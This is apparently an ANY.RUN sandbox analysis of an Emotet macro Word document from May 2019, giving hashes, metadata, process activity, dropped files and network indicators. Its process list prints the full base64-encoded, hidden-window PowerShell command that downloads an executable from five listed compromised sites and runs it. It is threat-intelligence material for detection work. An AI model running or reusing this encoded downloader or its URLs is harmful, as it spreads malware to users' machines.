analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

p0fc-ukirhb-npri

Full analysis: https://app.any.run/tasks/903cc434-0f44-4d1d-8f8b-7c404b228217
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 16:05:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: matrix ivory, Subject: Jewelery, Author: Oscar Leuschke, Comments: niches, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 13:33:00 2019, Last Saved Time/Date: Mon May 20 13:33:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0
MD5:

A6156688E375A085186FF23FE90DC724

SHA1:

6B17D8E76D8E4234A9224885207FFD27FFE7DEB0

SHA256:

C4548A16DBFBB5FDD5172D70BC93EA07AF48B0301EF25AD94B72D4FEB16A4488

SSDEEP:

3072:if77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qisQvQTo7b8SO5+1:if77HUUUUUUUUUUUUUUUUUUUT52VxsQZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3228)
    • Executed via WMI

      • powershell.exe (PID: 3228)
    • PowerShell script executed

      • powershell.exe (PID: 3228)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3320)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3320)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: matrix ivory
Subject: Jewelery
Author: Oscar Leuschke
Keywords: -
Comments: niches
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 12:33:00
ModifyDate: 2019:05:20 12:33:00
Pages: 1
Words: 10
Characters: 61
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Mertz, Gutmann and Gulgowski
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 70
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kozey
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3320"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\p0fc-ukirhb-npri.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3228powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABxADcANABfADkAOAA0ADQAPQAnAHYAMgBfADkAMQAyACcAOwAkAGgANAAwADQAMwA4ADIAMwAgAD0AIAAnADcAMAA0ACcAOwAkAG4AMgAwADIAXwA5AD0AJwBLADAANQAzADAANAAyADUAJwA7ACQARAA0ADgAMwA3ADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGgANAAwADQAMwA4ADIAMwArACcALgBlAHgAZQAnADsAJABIADYAXwBfADQAMAAxADEAPQAnAEUAMwAxAF8AOAAwADcAJwA7ACQAdwA5AF8AXwAxADUAOQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAYgBgAGMAbABpAGAARQBgAE4AdAA7ACQAegA5ADEANgAwADUANgA3AD0AJwBoAHQAdABwADoALwAvAHQAbwBuAGcAZABhAGkAZgBwAHQALgBuAGUAdAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAeQBsAEsATABkAEoAVwBPAGgALwBAAGgAdAB0AHAAOgAvAC8AZQAtAHMAYQBsAGEAbQBwAHIAbwAuAGMAbwBtAC8AcwBhAHMAbgBlAGsAYQB0AC4AYwBvAG0ALwBhAHcAYwAyADYAMAAxAGIAXwBrAGYAOQA1AHUAbABkAHkANAAtADMANgAvAEAAaAB0AHQAcAA6AC8ALwBmAGkAbAB0AG8ALgBtAGwALwBjAGcAaQAtAGIAaQBuAC8AYQBNAHEAcQB1AEUAcwBRAHcALwBAAGgAdAB0AHAAOgAvAC8AcQBwAGQAaQBnAGkAdABlAGMAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeABtAHQANgBrAHUANQA5AHAAbABfADgANgBiAHQAOABmAHYALQA3ADMAOQAxADkAOAAwADMALwBAAGgAdAB0AHAAOgAvAC8AbwBtAGUAcwB0AHIAZQBtAGEAcgBjAGUAbgBlAGkAcgBvAC4AYwBvAG0ALgBiAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBjAGcAZQB5AF8AdgBwADgANgA3AHMAMgAzADgALQAxADcALwAnAC4AUwBwAEwAaQBUACgAJwBAACcAKQA7ACQAVgA1ADMANwBfADIANQBfAD0AJwByADkANAA4ADMANwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgA1ADEANwBfADMAIABpAG4AIAAkAHoAOQAxADYAMAA1ADYANwApAHsAdAByAHkAewAkAHcAOQBfAF8AMQA1ADkALgBkAE8AVwBuAGwAbwBBAEQARgBJAEwARQAoACQAQgA1ADEANwBfADMALAAgACQARAA0ADgAMwA3ADIAKQA7ACQAcgAwADEAMgAwADMAPQAnAHoAMAA1ADcAXwA5ADUAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEADQAOAAzADcAMgApAC4AbABFAE4AZwBUAGgAIAAtAGcAZQAgADIAOAA2ADcANQApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABEADQAOAAzADcAMgA7ACQAegAwADEAOQAwADAAMQA9ACcAZgA4ADcAMAA1ADcANwAnADsAYgByAGUAYQBrADsAJAB3ADQANgBfADAANAAyADYAPQAnAEUAMQA0AF8AOAA4ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBfADIAMgBfADcAPQAnAFMAXwAxAF8ANQAxADcANgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 342
Read events
879
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFAD8.tmp.cvr
MD5:
SHA256:
3228powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8GR6GAVPF1E2O263KHY0.temp
MD5:
SHA256:
3320WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:17222E7BED955763CB75EBDA153E0074
SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21235ADF.wmfwmf
MD5:6FA521F2A2CBACBA0EB9D8C40E4701EB
SHA256:B161E62C80C5411AD3105C6BA78D01FB016323373F569D773E47BF0AAC18B0DC
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4C77754.wmfwmf
MD5:207BE09E79EB26078EE82A98E7956EA0
SHA256:4CE923899287D09C65A86055D6358B94C7BB430F8A3BAB4BFEF0E0EC64DC1C6F
3228powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:44C2A6A6B296E126EAC96DBDC52616DF
SHA256:65065D806B7AE340216144A39E9812C97BD417016DD08DE035A9095DD14C6BA9
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DB13CD6.wmfwmf
MD5:CB63DE1942CAC88B0CB0261C1BEB8394
SHA256:3CCC6F04D62EAFC74878C32F0FE0DCD8D9CE23EDE8C5E68FD964BD3BB6E4C6B7
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6AD07E9.wmfwmf
MD5:2DA88F0FE936F3B12CB340EACF81B8A6
SHA256:9EAB3E3621515F38E42BAA52ACD22C462B7E42D59BBC2693FD4316F2BD5514E1
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$fc-ukirhb-npri.docpgc
MD5:B0EC07801ACA5E4EA048AAF86D6DCE27
SHA256:92476575E466D02AA7DB79CA9AB620CA673FBE3D17E7367B6F14F8A418AA5F44
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3228
powershell.exe
GET
404
89.44.32.201:80
http://filto.ml/cgi-bin/aMqquEsQw/
RO
xml
345 b
suspicious
3228
powershell.exe
GET
404
103.58.148.214:80
http://qpdigitech.com/wp-admin/xmt6ku59pl_86bt8fv-73919803/
TH
xml
345 b
malicious
3228
powershell.exe
GET
404
203.113.174.46:80
http://tongdaifpt.net/wp-includes/hylKLdJWOh/
VN
xml
345 b
malicious
3228
powershell.exe
GET
404
103.253.212.121:80
http://e-salampro.com/sasnekat.com/awc2601b_kf95uldy4-36/
ID
xml
345 b
unknown
3228
powershell.exe
GET
404
201.73.143.108:80
http://omestremarceneiro.com.br/wp-includes/cgey_vp867s238-17/
BR
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3228
powershell.exe
203.113.174.46:80
tongdaifpt.net
Viettel Corporation
VN
malicious
3228
powershell.exe
89.44.32.201:80
filto.ml
Xt Global Networks Ltd.
RO
suspicious
3228
powershell.exe
103.253.212.121:80
e-salampro.com
Rumahweb Indonesia CV.
ID
unknown
3228
powershell.exe
201.73.143.108:80
omestremarceneiro.com.br
CLARO S.A.
BR
unknown
3228
powershell.exe
103.58.148.214:80
qpdigitech.com
DE-CORP
TH
malicious

DNS requests

Domain
IP
Reputation
tongdaifpt.net
  • 203.113.174.46
malicious
e-salampro.com
  • 103.253.212.121
unknown
filto.ml
  • 89.44.32.201
suspicious
qpdigitech.com
  • 103.58.148.214
malicious
omestremarceneiro.com.br
  • 201.73.143.108
suspicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ml Domain
No debug info